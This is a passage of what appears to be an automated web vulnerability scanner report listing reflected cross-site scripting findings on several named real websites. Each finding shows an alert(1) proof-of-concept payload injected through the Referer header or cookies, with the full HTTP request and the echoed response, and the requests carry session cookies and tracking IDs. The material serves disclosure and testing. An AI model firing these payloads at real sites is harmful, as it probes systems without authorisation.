The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b284d"-alert(1)-"70192e64f96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Mon, 25 Apr 2011 12:59:41 GMT
X-Varnish: 1310980199
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.57. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47973"-alert(1)-"4198eb1d78a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 13:02:15 GMT
X-Varnish: 1310986158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.58. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8efb9<script>alert(1)</script>2ae95f37538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935
Referer: http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 48806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538</div>
...[SNIP]...

5.59. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1146c<script>alert(1)</script>154e165be29 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=11146c<script>alert(1)</script>154e165be29; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:17 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11146c<script>alert(1)</script>154e165be29', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.60. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 384b1<script>alert(1)</script>9c302d4a2ba was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:21 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

5.61. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f1285<script>alert(1)</script>7568065879e was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:32 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741412; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.62. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a6378<script>alert(1)</script>96b3feedbdd was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:29 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741409; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.63. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload dedf1<script>alert(1)</script>6a1a09355da was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

5.64. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d5a27<script>alert(1)</script>214694deac1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

